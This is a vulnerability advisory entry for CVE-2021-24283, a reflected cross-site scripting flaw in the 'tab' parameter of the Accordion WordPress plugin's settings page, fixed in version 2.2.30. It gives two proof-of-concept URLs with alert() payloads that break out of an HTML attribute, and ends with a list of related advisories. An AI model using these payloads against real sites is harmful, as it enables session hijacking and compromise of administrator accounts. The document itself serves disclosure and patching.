Accordion < 2.2.30 – Authenticated Reflected Cross-Site Scripting (XSS) | CVE 2021-24283 | Plugin Vulnerabilities

Description

The tab GET parameter of the settings page is not sanitised or escaped when being output back in an HTML attribute, leading to a reflected XSS issue.

Proof of Concept

v < 2.2.29
https://example.com/wp-admin/edit.php?post_type=accordions&page=settings&tab=a%22%3E%3Csvg%2Fonload%3Dalert%28123%29%3B%2F%2F%3E%3C%22

v < 2.2.30
https://example.com/wp-admin/edit.php?post_type=accordions&page=settings&tab=a"+onfocus%3Dalert(%2FXSS%2F)+autofocus%3Dautofocus+b%3D

Affects Plugins

Fixed in 2.2.30

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

iohex

Submitter

iohex

Submitter twitter

Verified

Yes

WPVDB ID

6ccd9990-e15f-4800-b499-f7c74b480051

Timeline

Publicly Published

2021-04-21 (about 4 years ago)

Added

2021-04-21 (about 4 years ago)

Last Updated

2021-04-21 (about 4 years ago)

Other

Published

Title

Published

2025-02-11

Title

Notif Bell < 0.9.9 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2024-08-29

Title

Nirvana <= 1.6.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2017-12-19

Title

WordPress Concours <= 1.1 - Authenticated Cross-Site Scripting (XSS)

Published

2019-04-23

Title

KingComposer - Authenticated Stored XSS

Published

2025-04-10

Title

Everest Forms < 3.1.2 - Reflected Cross-Site Scripting